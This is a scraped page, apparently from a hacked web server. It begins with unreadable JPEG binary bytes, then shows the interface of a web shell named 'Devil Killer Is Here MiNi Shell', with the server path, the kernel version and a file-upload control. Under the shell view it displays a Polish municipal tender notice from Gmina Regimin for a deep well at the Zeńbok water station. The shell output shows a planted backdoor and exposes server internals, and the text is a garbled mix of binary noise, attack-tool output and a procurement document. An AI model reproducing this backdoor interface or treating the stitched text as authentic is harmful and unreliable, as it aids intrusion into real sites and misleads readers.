JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221123/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221123/0045447101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> MODERNIZACJA STACJI UZDATNIANIA WODY W M. ZEŃBOK<br/>(KOMPLEKSOWE WYKONANIE STUDNI GŁĘBINOWEJ NA TERENIE STACJI UZDATNIANIA WODY W M. ZEŃBOK) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA REGIMIN</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 130378396</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Adama Rzewuskiego 19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Regimin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">06-461</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL922 - Ciechanowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">23 6811755</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@regimin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.regimin.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> MODERNIZACJA STACJI UZDATNIANIA WODY W M. ZEŃBOK<br/>(KOMPLEKSOWE WYKONANIE STUDNI GŁĘBINOWEJ NA TERENIE STACJI UZDATNIANIA WODY W M. ZEŃBOK) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a15430dd-6b23-11ed-aea3-5a7c432eaced</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00454471</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.regimin.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Szczegółowe informacje dotyczące środków komunikacji zostały przedstawione w SWZ rozdział VII oraz XI, która została zamieszczona jako załącznik do ogłoszenia naszej stronie: www.bip.regimin.pl <br/>1)	Komunikacja pomiędzy Zamawiającym a Wykonawcami (składanie oświadczeń, dokumentów, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza): dostępnego na ePUAP https://epuap.gov.pl/wps/portal oraz udostępnionego przez miniPortal (Formularz do komunikacji) https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegółowe informacje dotyczące wymagań technicznych i organizacyjnych zostały przedstawione w SWZ rozdział VII oraz XI, która została zamieszczona jako załącznik do ogłoszenia naszej stronie: www.bip.regimin.pl <br/>Ofertę oraz wszystkie załączniki, w tym oświadczenie, składa się pod rygorem nieważności przy użyciu środków elektronicznych, w postaci elektronicznej opatrzonej podpisem elektronicznym kwalifikowanym , zaufanym lub osobistym.<br/><br/>1)	Komunikacja pomiędzy Zamawiającym a Wykonawcami (składanie oświadczeń, dokumentów, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza):<br/>dostępnego na ePUAP https://epuap.gov.pl/wps/portal oraz udostępnionego przez miniPortal (Formularz do komunikacji) https://miniportal.uzp.gov.pl <br/><br/>2) We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i <br/> Wykonawcy posługują się numerem ogłoszenia (BZP lub numerem referencyjnym (ID) postępowania).<br/> <br/>3) Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń <br/>składane są przez Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki. <br/><br/>4) Zamawiający zastrzega sobie możliwość komunikacji z Wykonawcami za pomocą poczty <br/>elektronicznej, na adres podany przez nich w złożonej ofercie Sposób komunikowania się Zamawiającego z Wykonawcami (nie dotyczy składania ofert i wniosków)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1)	Zamawiający informuję, że dane osobowe pozyskane w związku z przeprowadzeniem niniejszego postępowania przetwarzane będą na podstawie art. 6 ust. 1 lit. c Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „Rozporządzenie RODO&#34; w celu związanym z postępowaniem o udzielenie zamówienia publicznego<br/><br/>2)	Administratorem danych osobowych jest Zamawiający. Podstawą prawną przetwarzania danych osobowych stanowi ustawa Prawo zamówień publicznych wydane na jej podstawie akty wykonawcze, a także ustawa o narodowym zasobie archiwalnym i archiwach. <br/><br/>3)	Dane osobowe będą przetwarzane w celu: <br/><br/>	a) przeprowadzenie postępowania o udzielenie zamówienia publicznego,<br/>	b) zawarcia i realizacji umowy z wyłonionym w niniejszym postępowaniu wykonawcą,<br/>	c) dokonania rozliczenia i płatności związanych z realizacją umowy,<br/>	d) przeprowadzenie ewentualnych postępowań kontrolnych i / lub audytu przez komórki <br/> Zamawiającego i inne uprawnione podmioty,<br/>	e) udostępnienie dokumentacji postępowania i zawartej umowy jako informacji publicznej,<br/>	f) archiwizacji postępowania.<br/><br/>4) Dane osobowe będą ujawniane wykonawcom oraz wszystkim zainteresowanym.<br/><br/>5) Dane osobowe będą przechowywane przez okres obowiązywania umowy a następnie przez okres co najmniej 5 lat zgodnie z przepisami dotyczącymi archiwizacji. Dotyczy to wszystkich uczestników postępowania.<br/><br/>6)	Osobie, której dane dotyczą przysługuje na warunkach określonych w przepisach Rozporządzenia RODO:<br/> <br/>	a) prawo dostępu do danych (art. 15), <br/>	b) prawo sprostowania danych (art. 16),<br/>	c) prawo do usunięcia danych (art. 17),<br/>	d) prawo do ograniczenia przetwarzania danych (art. 18). <br/>	e) prawo wniesienia skargi do organu nadzorczego. <br/><br/>7)	Osobie, której dane dotyczą nie przysługuje:<br/><br/>	a) prawo do usunięcia danych osobowych, „prawo do bycia zapomnianym&#34; w związku z art. 17 <br/> ust. 3 lit. b, d lub e Rozporządzenia RODO,<br/>	b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 Rozporządzenia RODO,<br/>	c) prawo sprzeciwu, o którym mowa w art. 21 Rozporządzenia RODO, <br/><br/>8)	Podanie danych jest dobrowolne, jednakże ich niepodanie może uniemożliwić Zamawiającemu dokonanie oceny spełniania warunków udziału w postępowaniu oraz zdolności wykonawcy do należytego wykonania zamówienia, co skutkować może wykluczeniem wykonawcy z postępowania lub odrzuceniem jego oferty.<br/><br/>9)	Wystąpienie z żądaniem o którym mowa w pkt. 6 lub 7, nie ogranicza przetwarzania danych osobowych do czasu zakończenia niniejszego postępowania. Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania lub umowy.<br/><br/>10)	Wykonawca pozyskując dane osobowe na potrzeby sporządzenia oferty zobowiązany jest <br/> wypełnić obowiązki wynikające m. in. z art 13 i 14 Rozporządzenia RODO. Wykonawca składając <br/> ofertę składa oświadczenie dotyczące przetwarzania danych osobowych.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">KLAUZULA INFORMACYJNA DOTYCZĄCA PRZETWARZANIA DANYCH OSOBOWYCH<br/>Zgodnie z art. 13 ust. 1 oraz ust 2 ogólnego Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (DZ.U.UE.L.2016.119.1.), zwanego dalej rozporządzeniem informuję, że:<br/><br/>1) Administratorem Pana/Pani danych osobowych jest Wójt Gminy z siedzibą w Regiminie, ul Adama Rzewuskiego nr 19. 06-461 Regimin.<br/>2) Pana/Pani dane osobowe będą przetwarzane pod następującym adresem: Urząd Gminy w Regiminie, ul. Adama Rzewuskiego 19, 06-461 Regimin Kontakt telefoniczny: tel. (23) 6811756 , faks (23) 6858008; Adres e-mail: ug@regimin.pl Adres skrytki domyślnej Urzędu Gminy Regimin na platformie ePUAP : /1402082/SkrytkaESP.<br/>3) Administrator danych osobowych wyznaczył Inspektora Ochrony Danych - kontakt: e-mail: tomasz@kp.olsztyn.pl.<br/>4)	Administrator będzie przetwarzał Pana/Pani dane na podstawie art. 6 ust. 1 lit b) wskazanego wyżej rozporządzenia tj. przetwarzanie jest niezbędne w celu zawarcia i wykonania umowy, której stroną jest osoba której dane dotyczą lub do podjęcia działań na żądanie osoby, której dane dotyczą przed zawarciem umowy.<br/>5)	Odbiorcą danych osobowych mogą być upoważnieni pracownicy Administratora Danych Osobowych, podmioty którym należy udostępnić dane osobowe w celu wykonania obowiązku prawnego, a także podmioty którym dane zostaną powierzone do zrealizowania celów przetwarzania. <br/>6)	Powierzenie danych osobowych może nastąpić wyłącznie na rzecz podmiotów realizujących zadania w imieniu Administratora Danych Osobowych, na podstawie zawartej umowy powierzenia przetwarzania danych osobowych (tzw. podmioty przetwarzające).<br/>7) Pana/Pani dane osobowe będą przechowywane do momentu upływu okresu przedawnienia roszczeń wynikającego z ustawy – kodeks cywilny.<br/>8) Przysługuje Panu/Pani prawo:<br/>a) dostępu do treści danych, na podstawie art. 15 rozporządzenia;<br/>b) sprostowania danych, na podstawie art. 16 rozporządzenia;<br/>c) ograniczenia przetwarzania danych, na podstawie art. 18 rozporządzenia;<br/>d) skargi do organu nadzorczego tj. Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pan/i, że przetwarzanie danych osobowych narusza przepisy rozporządzenia.<br/>9)	Dane osobowe nie będą przetwarzane w sposób zautomatyzowany i nie będą podlegały automatycznemu profilowaniu przez Administratora danych osobowych.<br/>10)Udzielenie zgody na przetwarzanie danych osobowych jest dobrowolne, jednakże niezbędne dla realizacji celu ich przetwarzania tj. zawarcia u wykonania umowy. Konsekwencją nie podania danych osobowych jest brak możliwości zawarcia i wykonania umowy.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IDB.271.14.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 226000 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem niniejszego postępowania o udzielenie zamówienia jest opracowanie dokumentacji i uzyskanie w imieniu Zamawiającego decyzji zatwierdzającej dokumentację hydrogeologiczną, opracowanie operatu wodnoprawnego i uzyskanie pozwolenia wodnoprawnego na wykonanie urządzenia wodnego i pobór wód podziemnych oraz wykonanie studni głębinowej wraz z wyposażeniem i podłączeniem jej do SUW Zeńbok ( ujęcie wody podziemnej zlokalizowane jest na działce nr ewid. 436/2 obręb ewidencyjny nr 24 Zeńbok, gmina Regimin, powiat Ciechanowski). <br/><br/>1. Przedmiot zamówienia obejmuje m.in.:<br/>–	Wykonanie kompleksowej dokumentacji na likwidację otworu studziennego oraz wykonanie nowego w zakresie wynikającym z przepisów ustaw m.in. „Prawo geologiczne i górnicze”, „Prawo wodne” i „Prawo Budowlane” wraz z aktami wykonawczymi tj. m.in. projektu prac geologicznych na wykonanie ujęcia wód podziemnych wraz z jego zatwierdzeniem, dokumentacji hydrogeologicznej ujęcia ustalającej zasoby wraz z zatwierdzeniem, operatu wodnoprawnego na pobór wód podziemnych. Dokumentacje projektowa należy opracować w ilości niezbędnej do realizacji zadania Złożenie w imieniu Zamawiającego wniosku i uzyskanie decyzji o pozwoleniu na budowę studni /lub zgłoszenie robót na wykonanie studni/ oraz uzyskanie pozwolenia wodnoprawnego. Dla celów pozyskania niezbędnych zezwoleń Zamawiający przekaże stosowne pełnomocnictwo Wykonawcy w tym zakresie.<br/>- roboty ziemne związane z likwidacją otworu studziennego jak i jak i wykonaniem nowego <br/> otworu <br/>–	Wykonanie robót inżynieryjnych w zakresie wiercenia studni do projektowanej głębokości ok.40m.<br/>Przewidywane prace wykonania studni głębinowej metodą udarową o następującej konstrukcji:<br/> - wiercenie rurami stalowymi średnicy ø508mm ( 20”) do głębokości 28,00 mb (zostaną <br/> zabudowane w otworze<br/> - wiercenie rurami stalowymi średnicy ø456mm (18”) do głębokości 50,00 mb (do <br/> usunięcia na powierzchnię)<br/> - zabudowa filtra z rur stalowych ø350mm (14”) do długości ok. 30 mb<br/> - wykonanie filtrowania i pompowania studni<br/>–	Wykonanie prac budowlanych związanych obudową studzienną z laminatu poliestrowo-szklanego z wypełnieniem pianką poliuretanową wraz z kompletnym wyposażeniem (w tym wodomierz).<br/>–	Montaż fabrycznie nowej wraz z podłączeniem pompy głębinowej, dostosowanej do uzyskanej i zatwierdzonej wydajności eksploatacyjnej studni. Zakładana wydajność teoretyczna: Qe = 40,0 m3/h, .<br/>–	Montaż rur pompowych tłocznych celem podłączenia studni awaryjnej z istniejąca siecią wodociągową stalową dn 100 na terenie obiektu tj. ujęcia wody w Zeńboku. <br/>–	Montaż armatury: wodomierza, min. DN 150, zaworu zwrotnego kołnierzowego, zasuwy odcinającej przed i za wodomierzem oraz przygotowanie punktu do poboru wody surowej z rurociągu tłocznego.<br/>–	Montaż urządzenia regulującego naprzemienną pracę ujęć wody. (Zamawiający wymaga aby woda była pobierana np.: jednego dnia z istniejącego ujęcia, natomiast dnia następnego z ujęcia awaryjnego).<br/>–	Podłączenie do istniejącej sieci energetycznej zlokalizowanej na terenie SUW do projektowanej studni. <br/>–	Przygotowanie i przedłożenie dokumentacji określającej parametry studni wraz z dostosowaniem do nich systemu ujęcia wody.<br/><br/>Wykonawca przeszkoli osoby wskazane przez Zamawiającego w zakresie użytkowania studni, zabudowanych urządzeń oraz obsługi<br/>-szkolenie zostanie przeprowadzone w formie wykładu teoretycznego i zajęć praktycznych w zakresie niezbędnym do prawidłowej obsługi zabudowanych urządzeń (np. zgodnie z DTR urządzenia, warunkami gwarancji i prawidłowej eksploatacji):<br/><br/>Szczegółowy zakres i wielkość zamówienia przedstawiony został w SWZ, we wzorze umowy oraz w Programie Funkcjonalno-Użytkowym, zamieszczonych na naszej stronie (https://bip.regimin.pl/) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45255110-3 - Roboty budowlane w zakresie studni</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45232000-2 - Roboty pomocnicze w zakresie rurociągów i kabli</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45262200-3 - Fundamentowanie i wiercenie studni wodnych</p> <p class="mb-0">71351910-5 - Usługi geologiczne</p> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-05-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Szczegółowe informacje dotyczące oceny ofert zostały przedstawione w<br/>SWZ rozdział XIII oraz XIV, która została zamieszczona jako załącznik do ogłoszenia na naszej stronie: www.bip.regimin.pl</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie zawodowe kierownika budowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie zawodowe geologa-hydrogeologa</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu; <br/>2) spełniają warunki udziału w postępowaniu, określone w ogłoszeniu o zamówieniu oraz <br/> niniejszej specyfikacji warunków zamówienia.<br/><br/>2. Warunki udziału w postępowaniu dotyczą:<br/>1) zdolności do występowania w obrocie gospodarczym art. 113 Pzp,<br/> <br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/><br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej art 114 Pzp,<br/> <br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/><br/>Warunek ten zamawiający uzna za spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane.<br/> <br/>3) sytuacji ekonomicznej lub finansowej art. 115 Pzp,<br/> <br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/><br/>4) zdolności technicznej lub zawodowej art.116 Pzp,<br/><br/>Opis sposobu dokonania oceny spełniania warunku:<br/><br/> a) Przy wykazie robót Wykonawca winien wykazać, że wykonał minimum jedno robotę <br/> odpowiadającą rodzajem przedmiotowemu zamówieniu. Wartość roboty za minimum <br/> 50 000,00 zł brutto. Wykonawca może wykazać roboty związane z budową studni <br/> głębinowej)<br/><br/>Ocena spełniania warunku będzie dokonana zgodnie z formułą spełnia/nie spełnia, na podstawie złożonego wykazu wykonanych robót 